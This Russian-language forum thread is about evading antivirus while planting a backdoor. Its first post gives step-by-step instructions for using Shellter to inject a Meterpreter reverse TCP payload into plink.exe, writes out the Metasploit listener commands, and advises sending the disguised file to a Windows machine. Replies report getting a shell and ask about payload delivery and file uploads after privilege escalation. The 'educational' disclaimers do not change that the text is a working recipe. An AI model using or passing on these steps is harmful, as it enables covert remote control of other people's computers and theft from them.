Как обходить антивирусов при тестировании на проникновение в систему

  • Автор темы Adil Adilzade
  • Дата начала
A

Adil Adilzade

Гость
#1
Сегодня речь пойдет об очень редком материале в интернете, о программе называемой как Шэллтер (Shellter). Принцип работы софта очень прост - программа берет exe файл из Windows и чудным способом преобразует его так чтобы он "не палился" антивирусом (для удаленного доступа к жертве). Автоматический мод программы позволяет пользователю указать лишь нужные параметры, об остальном она позаботится сама.

Я думаю столько информации хватит давайте приступим к делу.

(Сразу оговариваюсь, что я не несу ответственность за нанесенный вред вашему или другому компьютеру. Это все проводится в ознакомительных целях.)



1) Скачайте и установите программу
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться


2) Разархивируйте и перенесите в раздел 'root/Desktop'.

3) Перенесите “plink.exe” из ‘usr/share/windows-binaries’ и скопируйте его в папку с Shellter, т.е сюда ‘/root/Desktop/shellter’.

4) Чтобы начать использовать пишите в терминале “wine shellter.exe” (без кавычек)

5) Нажмите “A” для переключения на автоматический режим.

6) В следующем напишите “plink.exe”, который мы скопировали в директорию с Шэллтэром.

7) EnableStealthMode? Здесь нажмите “Y”. Это позволит программе сохранить exe файл без лишнего кода т.е оригинал.

8) Когда программа спрашивает вас выбрать Payload нажмите сперва на L потом выберите 1 для Meterpreter_Reverse_TCP. Если выберите 'С' то программа выберет наугад.

9) Дальше вы должны написать ваш локальный ip адрес с которой "проводите тестирование на проникновение".

10) Напишите порт (я написал 4545)
Нажмите на энтэр
Здесь Шэллтэт преобразует код для вас.

После завершения работы вы увидите свой ‘plink.exe’ (замаскированный файл) и ‘plink.exe.bak’ (originalfile) в директории Shellter.

Вот и все мы закончили свое дело с Шэллтэром. А теперь давайте вдобавок покажу вам как протестировать этот файл.

11) Мы должны создать "Сервер прослушивания" для этого в терминале пишем:

start Metasploit (‘msfconsole’ на терминале)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.39 (Это в моем случае,вы можете проверить свой айпи адрес командой "ifconfig")

set lport 4545

exploit

12) Скопируйте (отправьте, дайте ссылку для скачивания и т.д) свой ‘plink.exe’ на Виндовс.

Теперь если вы запустите свой файл на Виндовс, то вы увидите всего лишь справочный документ на терминале. Т.е мы получили доступ к компьютеру но не полноценно. Но если же мы хотели взять контроль над другой машиной мы написали бы.....

plink 192.168.1.136

(Но не делаем потому что это противозаконно!)

Все это перечисленное было на терминале Шэллтэра

На терминале Метасплоита. (Снова оговариваюсь что это проводилось всего лишь в ознакомительных целях)

Мы можем получить информацию о Виндовс набрав “sysinfo”. Т.е в метасплоите мы получили доступ к командной строке Виндовс

Вот и все что я хотел показать вам. Надеюсь администратор увидит мой пост и отблагодарит книгой ! :) Всего хорошего..
 

WebWare Team

Well-Known Member
Администратор
30.12.2015
1 251
1 288
#2
Уважаемый Adil Adilzade, пожалуйста зарегистрируйтесь на форуме с того же IP, с которого написали это краткое руководство ☺
 

Adil

New Member
Премиум
17.02.2016
1
3
#3
Уважаемый Adil Adilzade, пожалуйста зарегистрируйтесь на форуме с того же IP, с которого написали это краткое руководство ☺
Здравствуйте. Регистрацию прошел но не знаю с того ли айпи или нет )) честное слово это я ))
 

Necromancer

New Member
Премиум
03.02.2016
4
3
#4
Спасибо за хорошую статью. В целом программа полезная, шелл получить удалось. Пока еще не разобрался как подключать собственные эксплойты. (Находил где то статью на английском, но в большинство файлов эксплойт так засунуть и не удалось). Так же под вопросом доставка файла с эксплойтом и его удаленный запуск. (если отбросить соц.инж.)

+ еще вопрос, не совсем по теме (скорее относится к функционалу meterpreter) - в правах поднялся, доступ к реестур и файловой системе есть, но вот свои файлы загрузить удаленно через upload %path% не выходит. Читать и удалять файлы могу. Директории создаются корректно, а вот создать свой файл либо запихнуть готовый не выходит. (ошибка access denied) .Может что посоветуете?
 

di3mus

New Member
21.09.2016
2
1
#5
EnableStealthMode? Здесь нажмите “Y”. Это позволит программе сохранить exe файл без лишнего кода т.е оригинал
Насколько знаю stealthmode служит для внедрения нескольких нагрузок (http-reverse, tcp-reverse и т.д) в одном исполняемом файле.